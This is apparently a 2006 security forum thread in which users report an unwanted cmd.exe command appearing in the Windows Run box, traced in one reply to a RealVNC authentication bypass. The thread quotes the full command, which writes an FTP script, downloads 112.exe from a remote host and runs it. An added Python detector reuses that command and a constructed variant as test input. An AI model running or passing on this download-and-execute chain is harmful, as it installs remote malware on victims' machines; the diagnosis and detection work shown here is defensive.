
Security Forums


intrusion or virus?

calvin43
Just Arrived
Joined: 03 Nov 2006
Posts: 0

Posted: Fri Nov 03, 2006 4:42 pm    Post subject: intrusion or virus?

Hi all,
I would like to get some help. My Start > Run box opens by itself and I can see this string, as if someone was typing it in:
cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
Obviously 81.128.84.212 was my IP address.
I can't get rid of it.
Any help will be very appreciated.
Thanks
davide
kinolux
Just Arrived
Joined: 06 Nov 2006
Posts: 0
Location: Luxembourg

Posted: Mon Nov 06, 2006 2:04 am    Post subject: VNC server running?

Hi Davide,

I have also had the same problem since Friday. Do you have VNC server always running on your PC? Then disabling it may help.
I found that the VNC Server icon in the task tray was black when I had this problem, as if "somebody" was connecting and playing with my PC.
I think it's due to a kind of virus program which is running on my PC and simulating remote control....
Probably it's a very new virus and no anti-virus program can detect it yet? I tried 2 checking programs (CA and Trend-Micro) but they didn't find anything.

kino
calvin43
Just Arrived
Joined: 03 Nov 2006
Posts: 0

Posted: Mon Nov 06, 2006 10:19 am    Post subject: Intrusion or virus

Hi Kino,
Yes, I do have VNC 4.1 free edition and I have done the upgrade to the 4.2.6 version. Actually it seems that the problem has stopped. But I think that I still have the program on my PC. I think it's a rootkit. My AVG Antivirus and Spyware Doctor antispyware can't see that malware.
To monitor what is happening on my computer I downloaded these programs:
Net Alert 2001 http://members.ozemail.com.au/~aschnaider/netalert.htm
CurrPorts http://www.nirsoft.net/
To detect rootkits and protect I use Cyberhawk and Sophos Anti-Rootkit:
http://www.novatix.com/Cyberhawk/
http://www.sophos.it/products/free-tools/sophos-anti-rootkit.html
To check the status of my vulnerability I used Shields Up! on this site:
http://www.grc.com/default.htm
Anyway, I have seen around that it isn't just us with that problem.
davide
Sgt_B
Trusted SF Member
Joined: 28 Oct 2002
Posts: 16777215
Location: Chicago, IL US

Posted: Mon Nov 06, 2006 11:37 pm

Good times with the RealVNC 4.1 Authentication Bypass Vulnerability.
Patching your system should reduce the risk that you'll be compromised again. An attacker can leverage this issue against you in order to establish a remote session with your PC without knowing your VNC password. This isn't just you.

Post exploitation the attacker appeared to create an FTP script in order to download a utility named 112.exe. This is likely a backdoor/rootkit/nasty nasty thing designed to allow the attacker to maintain control over your machine.

Getting rid of it? Well I've got no idea what 112.exe is but you may want to head over to the HijackThis forum on this site. They're insanely intelligent when it comes to these kinds of things, and maybe they'll be able to help you out.
Micro-Shock
Just Arrived
Joined: 09 Nov 2006
Posts: 0

Posted: Thu Nov 09, 2006 2:41 am    Post subject: Intrusion or virus

Hey....
Was wondering if there was an update to this. I have been getting the same thing... every time though it is a different exe file... on each machine. Is there a new worm out that is doing this automated now? Seen 3 computers... different exe file names... and located in 3 different countries... trying to find a common link between them.

Thanks for any information you can provide. I am at a loss.... I would think VNC... 4.1.1 but... at least one of the users... running a firewall on the laptop... plus a hardware firewall/GW and managed to get the same thing....

virus scans turn up nothing...
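
Added example (not part of any post in this thread): Python detection logic for the command-line chain quoted in the first post and explained in Sgt_B's reply, keyed on the structure of the chain (echo-built FTP script, `ftp -s:`, then running the fetched file) rather than on the file name, which posters report differs per machine. The function name `analyze`, the result fields and the `CONSTRUCTED` log lines are assumptions made for illustration.

```python
import re

# Command line quoted in the first post of this thread.
SAMPLE = ("cmd.exe /c del i&echo open 81.128.84.212 7085 > i&echo user 1 1 >> i "
          "&echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit")
# Constructed log lines (not from the thread): a renamed variant and a benign one.
CONSTRUCTED = [
    "cmd /c echo open 192.0.2.10 2121 > x.txt&echo get a.exe >> x.txt&ftp -n -s:x.txt&a.exe",
    "cmd.exe /c echo build finished > status.txt",
]

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>{1,2}\s*(\S+)$", re.I)   # echo <text> > <file>
FTP_RE = re.compile(r"^ftp(?:\.exe)?\b.*?-s:(\S+)", re.I)        # ftp ... -s:<file>


def analyze(cmdline):
    """Flag a command line that writes an FTP script with echo, runs it with
    `ftp -s:`, and (worst case) executes a file that script downloaded."""
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    scripts = {}                  # script file -> FTP commands echoed into it
    used, fetched, executed = None, [], []
    for part in filter(None, (p.strip() for p in body.split("&"))):
        first = part.split()[0].lower()
        echo, ftp = ECHO_RE.match(part), FTP_RE.match(part)
        if echo:
            scripts.setdefault(echo.group(2).lower(), []).append(echo.group(1))
        elif ftp and ftp.group(1).lower() in scripts:
            used = ftp.group(1).lower()
            for line in scripts[used]:
                words = line.lower().split()
                if len(words) > 1 and words[0] in ("get", "recv", "mget"):
                    fetched.append(words[-1])
        elif used and first in fetched:
            executed.append(first)   # downloaded file is run in the same chain
    if used is None:
        return None
    server = next((l.split()[1:] for l in scripts[used]
                   if l.lower().startswith("open ")), [])
    return {"script": used, "server": server, "fetched": fetched,
            "executed": executed, "severity": "high" if executed else "medium"}


if __name__ == "__main__":
    for line in [SAMPLE] + CONSTRUCTED:
        print(analyze(line))
```

Fed process-creation command lines from endpoint logging, a "high" result means the download and the execution happened in one chain, so the host should be treated as compromised rather than merely probed.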
calvin43
Just Arrived
Joined: 03 Nov 2006
Posts: 0

Posted: Thu Nov 09, 2006 1:57 pm

I upgraded VNC Viewer to the professional version and the problem has gone.
davide
All times are GMT + 2 Hours